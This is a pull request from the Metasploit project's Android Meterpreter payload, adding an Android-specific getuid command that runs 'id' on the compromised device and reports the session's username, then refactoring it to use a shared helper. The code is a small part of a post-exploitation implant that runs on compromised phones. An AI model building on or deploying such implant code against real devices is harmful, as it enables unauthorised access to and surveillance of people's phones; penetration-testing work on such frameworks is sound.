### PR TITLE
Implement an Android-specific version of getuid

### DIFF
--- a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@@ -13,6 +13,7 @@ import com.metasploit.meterpreter.android.interval_collect;
 import com.metasploit.meterpreter.android.send_sms_android;
 import com.metasploit.meterpreter.android.stdapi_fs_file_expand_path_android;
 import com.metasploit.meterpreter.android.stdapi_sys_config_sysinfo_android;
+import com.metasploit.meterpreter.android.stdapi_sys_config_getuid;
 import com.metasploit.meterpreter.android.stdapi_sys_process_get_processes_android;
 import com.metasploit.meterpreter.android.webcam_audio_record_android;
 import com.metasploit.meterpreter.android.webcam_get_frame_android;
@@ -42,7 +43,6 @@ import com.metasploit.meterpreter.stdapi.stdapi_fs_stat;
 import com.metasploit.meterpreter.stdapi.stdapi_net_config_get_interfaces_V1_4;
 import com.metasploit.meterpreter.stdapi.stdapi_net_config_get_routes_V1_4;
 import com.metasploit.meterpreter.stdapi.stdapi_net_socket_tcp_shutdown_V1_3;
-import com.metasploit.meterpreter.stdapi.stdapi_sys_config_getuid;
 import com.metasploit.meterpreter.stdapi.stdapi_sys_process_execute_V1_3;
 
 import java.io.DataInputStream;

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_config_getuid.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_config_getuid.java
@@ -1,0 +1,47 @@
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+import java.io.BufferedReader;
+import java.io.InputStreamReader;
+
+public class stdapi_sys_config_getuid implements Command {
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        Process proc = Runtime.getRuntime().exec(new String[]{
+                "sh", "-c", "id 2>/dev/null"
+        });
+        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
+        String line = br.readLine();
+        if (line == null) {
+            return ERROR_FAILURE;
+        }
+
+        String parts[] = line.split(" ");
+        if (parts.length < 2) {
+            return ERROR_FAILURE;
+        }
+
+        String userName = "unknown";
+
+        for (String part : parts) {
+            String parts2[] = part.split("=");
+            if (parts2.length < 2) {
+                return ERROR_FAILURE;
+            }
+            if (parts2[0].equals("uid")) {
+                String parts3[] = parts2[1].split("[\\(\\)]");
+
+                if (parts3.length > 1) {
+                    userName = parts3[1];
+                    break;
+                }
+            }
+        }
+
+        response.add(TLVType.TLV_TYPE_USER_NAME, userName);
+        return ERROR_SUCCESS;
+    }
+}

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_config_getuid.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_config_getuid.java
@@ -3,18 +3,12 @@ package com.metasploit.meterpreter.android;
 import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
 import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.Utils;
 import com.metasploit.meterpreter.command.Command;
-
-import java.io.BufferedReader;
-import java.io.InputStreamReader;
 
 public class stdapi_sys_config_getuid implements Command {
     public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
-        Process proc = Runtime.getRuntime().exec(new String[]{
-                "sh", "-c", "id 2>/dev/null"
-        });
-        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
-        String line = br.readLine();
+        String line = Utils.runCommand("id");
         if (line == null) {
             return ERROR_FAILURE;
         }


### PR DESCRIPTION
Prior to this commit, the Android Meterpreter shell always identified sessions as running as root. After this commit, the correct username is shown, as parsed from output running /system/bin/id. The previous implementation depends on *System.getProperty("user.name")*, which [the Android developer documentation states](http://developer.android.com/reference/java/lang/System.html#getProperty(java.lang.String)) is "Not useful on Android"